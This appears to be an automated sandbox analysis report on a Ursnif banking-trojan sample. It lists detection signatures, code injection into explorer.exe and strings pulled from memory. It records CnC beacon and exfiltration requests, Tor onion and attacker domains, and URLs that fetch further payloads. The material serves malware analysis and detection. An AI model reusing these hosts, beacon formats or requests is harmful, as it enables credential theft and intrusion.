Loading ...

Play interactive tourEdit tour

Analysis Report 4.bin

Overview

General Information

Sample Name:4.bin (renamed file extension from bin to exe)
Analysis ID:293592
MD5:428e0c87889570c347967a444e6247a5
SHA1:dfa3794f06865a91d1fcfebe9176dddab7d66d38
SHA256:60924e938260500bea6ca3a3475455bdea8ec70ad6df3358f2f867460061c535

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
May check the online IP address of the machine
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Rundll32 Activity
Stores large binary data to the registry
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • 4.exe (PID: 6740 cmdline: 'C:\Users\user\Desktop\4.exe' MD5: 428E0C87889570C347967A444E6247A5)
    • control.exe (PID: 1632 cmdline: C:\Windows\system32\control.exe /? MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4628 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A73F.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 4012 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 4840 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A83F.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5608 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 2940 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A73F.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5368 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A83F.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5212 cmdline: 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 4540 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /? MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000025.00000002.437630054.0000000002A2D000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000025.00000003.435889269.0000000002650000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 12 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe /?, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 1632, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?, ProcessId: 4540

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: 4.exeAvira: detected
            Multi AV Scanner detection for domain / URLShow sources
            Source: adonis-medicine.atVirustotal: Detection: 8%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: 4.exeVirustotal: Detection: 78%Perma Link
            Source: 4.exeReversingLabs: Detection: 79%
            Machine Learning detection for sampleShow sources
            Source: 4.exeJoe Sandbox ML: detected
            Source: 0.0.4.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 0.2.4.exe.60000.0.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 0.2.4.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: C:\Windows\explorer.exeCode function: 15_2_03B6645C RegisterDeviceNotificationA,15_2_03B6645C
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A3B4B CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_020A3B4B
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5B954 FindFirstFileW,DeleteFileW,FindNextFileW,15_2_03B5B954
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5A684 CreateFileA,FindCloseChangeNotification,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,15_2_03B5A684
            Source: C:\Windows\explorer.exeCode function: 15_2_03B53CAC FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,15_2_03B53CAC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A11EB9 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,37_2_02A11EB9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A0D3BA memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,37_2_02A0D3BA

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.5:49751 -> 87.106.18.141:80
            Source: TrafficSnort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.5:49751 -> 87.106.18.141:80
            Found Tor onion addressShow sources
            Source: control.exe, 0000000D.00000003.388861020.000001ED6355C000.00000004.00000040.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion
            Source: control.exe, 0000000D.00000003.388861020.000001ED6355C000.00000004.00000040.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
            Source: control.exe, 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: explorer.exe, 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.at
            Source: RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.atconstitution.org/usdeclar.txt0x4eb7d2cacom ru org1011totalzaelooop11.club/jd/t32.bin file://c:\test\test32.dll11totalzaelooop11.club/jd/t64.bin file://c:\test\tor64.dllcurlmyip.net12s4Sc9mDb35Ayj8oO1300300300300300101003160
            Source: RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion
            Source: RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
            Source: RuntimeBroker.exe, 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: rundll32.exe, 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.at
            Source: rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.atconstitution.org/usdeclar.txt0x4eb7d2cacom ru org1011totalzaelooop11.club/jd/t32.bin file://c:\test\test32.dll11totalzaelooop11.club/jd/t64.bin file://c:\test\tor64.dllcurlmyip.net12s4Sc9mDb35Ayj8oO1300300300300300101003160
            Source: rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion
            Source: rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
            Source: RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.at
            Source: RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.atconstitution.org/usdeclar.txt0x4eb7d2cacom ru org1011totalzaelooop11.club/jd/t32.bin file://c:\test\test32.dll11totalzaelooop11.club/jd/t64.bin file://c:\test\tor64.dllcurlmyip.net12s4Sc9mDb35Ayj8oO1300300300300300101003160
            Source: RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion
            Source: RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
            Source: RuntimeBroker.exe, 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.at
            Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion http://adonis-medicine.atconstitution.org/usdeclar.txt0x4eb7d2cacom ru org1011totalzaelooop11.club/jd/t32.bin file://c:\test\test32.dll11totalzaelooop11.club/jd/t64.bin file://c:\test\tor64.dllcurlmyip.net12s4Sc9mDb35Ayj8oO1300300300300300101003160
            Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion
            Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
            Source: RuntimeBroker.exe, 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            May check the online IP address of the machineShow sources
            Source: unknownDNS query: name: myip.opendns.com
            Source: unknownDNS query: name: myip.opendns.com
            Source: unknownDNS query: name: myip.opendns.com
            Source: unknownDNS query: name: myip.opendns.com
            Uses nslookup.exe to query domainsShow sources
            Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com Jump to behavior
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: global trafficHTTP traffic detected: GET /images/MJnY1AiUvCDG/50GERxkRiSh/jlBF7DudGiB9lb/C7JiMcaZv8z0azvGiFzA1/s_2FA7MRubeEVb1g/eaTQPp5c8aMkRtN/jw16FgWyoqNgUNMa8Y/mf68RWE_2/FN25BA5ahETzE4XJe22R/ZrVip0RGzu9P387g00z/At20l0yyTMfUv800M8hcll/7Y9doTpTO_2FwNXo/aVcKB.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: adonis-medicine.at
            Source: global trafficHTTP traffic detected: POST /images/r9VYgVAUdB/rstcnl7bdkZ3Zejtq/ydgspSv2v_2B/hZUO7aLO9N1/H4RZTOx2UzNBVv/E0RBNqDlEhLUbiikZzyAT/Pz5aNZuiUjHkQmTc/O_2FQaAS6GlxUS3/A5VpVeNDLMFzEKDw4a/k1jdfoCRa/nD4KIKepHQ5ahHWGS2mg/C7IZ5DSBJi5xGvkhYfn/vDkMP_2B5Dj5rDsybOr8GK/e2zZOV6QZ_2BAXPQE/3.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=107585302942641254533219114266User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Content-Length: 387Host: adonis-medicine.at
            Source: global trafficHTTP traffic detected: GET /images/MJnY1AiUvCDG/50GERxkRiSh/jlBF7DudGiB9lb/C7JiMcaZv8z0azvGiFzA1/s_2FA7MRubeEVb1g/eaTQPp5c8aMkRtN/jw16FgWyoqNgUNMa8Y/mf68RWE_2/FN25BA5ahETzE4XJe22R/ZrVip0RGzu9P387g00z/At20l0yyTMfUv800M8hcll/7Y9doTpTO_2FwNXo/aVcKB.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: adonis-medicine.at
            Source: RuntimeBroker.exe, 00000018.00000002.525765320.000001E76746C000.00000004.00000001.sdmpString found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.facebook.com (Facebook)
            Source: RuntimeBroker.exe, 00000018.00000002.525765320.000001E76746C000.00000004.00000001.sdmpString found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.twitter.com (Twitter)
            Source: RuntimeBroker.exe, 00000018.00000002.525765320.000001E76746C000.00000004.00000001.sdmpString found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.facebook.com (Facebook)
            Source: RuntimeBroker.exe, 00000018.00000002.525765320.000001E76746C000.00000004.00000001.sdmpString found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.twitter.com (Twitter)
            Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmpString found in binary or memory: FIND US: www.facebook.com/HiddenCityGame equals www.facebook.com (Facebook)
            Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmpString found in binary or memory: FOLLOW US: www.twitter.com/g5games equals www.twitter.com (Twitter)
            Source: RuntimeBroker.exe, 00000018.00000002.526157992.000001E7675B6000.00000004.00000001.sdmpString found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
            Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmpString found in binary or memory: WATCH US: www.youtube.com/g5enter equals www.youtube.com (Youtube)
            Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmpString found in binary or memory: rivacy Policy: https://www.facebook.com/about/privacy/ equals www.facebook.com (Facebook)
            Source: unknownDNS traffic detected: queries for: 11totalzaelooop11.club
            Source: unknownHTTP traffic detected: POST /images/r9VYgVAUdB/rstcnl7bdkZ3Zejtq/ydgspSv2v_2B/hZUO7aLO9N1/H4RZTOx2UzNBVv/E0RBNqDlEhLUbiikZzyAT/Pz5aNZuiUjHkQmTc/O_2FQaAS6GlxUS3/A5VpVeNDLMFzEKDw4a/k1jdfoCRa/nD4KIKepHQ5ahHWGS2mg/C7IZ5DSBJi5xGvkhYfn/vDkMP_2B5Dj5rDsybOr8GK/e2zZOV6QZ_2BAXPQE/3.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=107585302942641254533219114266User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Content-Length: 387Host: adonis-medicine.at
            Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmpString found in binary or memory: http://adonis-medicine.at
            Source: explorer.exe, 0000000F.00000002.541052132.00000000053C4000.00000004.00000001.sdmpString found in binary or memory: http://adonis-medicine.at/images/r9VYgVAUdB/rstcnl7bdkZ3Zejtq/ydgspSv2v_2B/hZUO7aLO9N1/H4RZTOx2UzNBV
            Source: RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmpString found in binary or memory: http://adonis-medicine.atconstitution.org/usdeclar.txt0x4eb7d2cacom
            Source: control.exe, 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: control.exe, 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onion
            Source: control.exe, 0000000D.00000003.388861020.000001ED6355C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000011.00000002.519670891.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.393492614.00000232E16FC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000018.00000002.526443465.000001E767702000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001D.00000002.513862358.00000209ABB02000.00000004.00000001.sdmpString found in binary or memory: http://h33a7jzovxp2dxfg.onionhttp://adonis-medicine.at
            Source: control.exe, 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmpString found in binary or memory: http://messenger.comIL
            Source: RuntimeBroker.exe, 00000018.00000000.394678298.000001E764D02000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cmgS
